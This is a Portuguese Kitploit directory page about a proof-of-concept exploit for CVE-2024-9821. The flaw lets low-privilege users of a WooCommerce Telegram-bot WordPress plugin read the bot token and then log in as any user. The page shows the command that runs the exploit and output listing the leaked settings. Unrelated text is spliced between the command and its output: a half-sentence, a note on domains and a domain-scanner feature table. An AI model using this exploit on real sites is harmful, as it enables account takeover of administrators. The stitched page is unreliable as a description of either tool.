Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9821 — Bot para Telegram no WooCommerce <= 1.2.4 - Divulgação do Token do Bot do Telegram Autenticado (Subscriber+) para Bypass de Autenticação | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-9821
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubrandomrobbiebf/cve-2024-9821

CVE-2024-9821

Bot para Telegram no WooCommerce <= 1.2.4 - Divulgação do Token do Bot do Telegram Autenticado (Subscriber+) para Bypass de Autenticação

Ver Repositório
19há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9821

Bot for Telegram on WooCommerce <= 1.2.4 - Autenticado (Assinante+) Divulgação de Token do Bot do Telegram para Bypass de Autenticação

Descrição

O plugin Bot for Telegram on WooCommerce para WordPress é vulnerável à divulgação de informações sensíveis devido à falta de verificações de autorização na ação AJAX 'stm_wpcfto_get_settings' em todas as versões até, e incluindo, 1.2.4. Isso possibilita que atacantes autenticados, com nível de acesso de assinante ou superior, visualizem o Token do Bot do Telegram, um token secreto usado para controlar o bot, que pode então ser usado para fazer login como qualquer usuário existente no site, como um administrador, se souberem o nome de usuário, devido ao recurso Login with Telegram.``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821

* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* Link de download: [Baixar bot-for-telegram-on-woocommerce Versão 1.2.4](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)


POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user

estado. Se v

Você precisa ter muito cuidado com os nomes de domínio que possui, pois um único erro pode levar à perda de tudo que você tem.

Como obter a lista de domínios criptografados

Você pode obter a lista de domínios criptografados a partir deste gist.

-->

Funcionalidades

FuncionalidadeEstado
Idade do domínio (em anos)✅
Serviços extras do domínio (pesquisar por "dns", "www", "email")✅
Comando host para obter o IP por trás de um domínio✅
Registrador do domínio✅
Data de criação do domínio✅
Data de expiração do domínio✅
Data da última atualização do domínio✅
Whois reverso (email, nome, organização)✅
Servidor de nomes do domínio (NS)✅
Troca de correio do domínio (MX)✅
'get' o JSON completo para um domínio✅
'get' a chave específica da saída JSON✅
Varredura de múltiplos domínios com -l ou --list✅
Saída JSON transparente (se você quiser canalizar dados para outro lugar, estará em um formato JSON adequado)✅
User-Agent aleatório✅
Saída colorida no terminal (se não quiser cores, use --no-color)✅
Exportar para JSON ou XLSX (por padrão, se usar -o/--output, exportará para CSV)✅
Varredura de domínios a partir de uma wordlist (leia mais: Suporte a wordlist)✅
Escrever em um arquivo (usando -w ou --write)✅
Limite de exibição (com -dl ou --display-limit)✅
Validação de serviços HTTP/HTTPS e não HTTP✅
(Novo) Varredura sequencial em vez de varredura encadeada: você pode passar -seq ou --sequential✅
Suporte a proxy SOCKS5 (com --socks5 ou --proxy)🔴 (Testando)
Suporte multiplataforma✅
Suporte a Docker (leia mais: Executar com Docker)✅
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
{ 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram '
                                                                'Bot Token',
                                                       'type': 'text',
                                                       'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'},
                                  'bftow_bot_name': {   'description': 'Set '
                                                                       'if '
                                                                       'you '
                                                                       'want '
                                                                       'user '
                                                                       'to '
                                                                       'get '
                                                                       'back '
                                                                       'to '
                                                                       'Telegram '
                                                                       'after '
                                                                       'successful '
                                                                       'checkout. '
                                                                       '(Without '
                                                                       '&quot;@&quot;)',
                                                        'label': 'Telegram '
                                                                 'Bot Name',
                                                        'type': 'text',
                                                        'value': 'Superbotman'},
                                  'bftow_buttons': {   'description': 'Save '
                                                                      'BOT '
                                                                      'Token '
                                                                      'first',
                                                       'label': 'Activate '
                                                                'API URL',
                                                       'type': 'bftow_webhook_activation',
                                                       'value': ''},
                                  'bftow_google_maps_api_key': {   'description': '<a '
                                                                                  'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide '
                                                                                  'Google '
                                                                                  'Maps '
                                                                                  'API '
                                                                                  'key</a> '
                                                                                  'with '
                                                                                  'enabled '
                                                                                  'geocoding '
                                                                                  'API '
                                                                                  'and '
                                                                                  'configured '
                                                                                  'billing '
                                                                                  'account. '
                                                                                  'If '
                                                                                  'you '
                                                                                  'leave '
                                                                                  'this '
                                                                                  'field '
                                                                                  'empty, '
                                                                                  'the '
                                                                                  'location '
                                                                                  'will '
Baixar ferramenta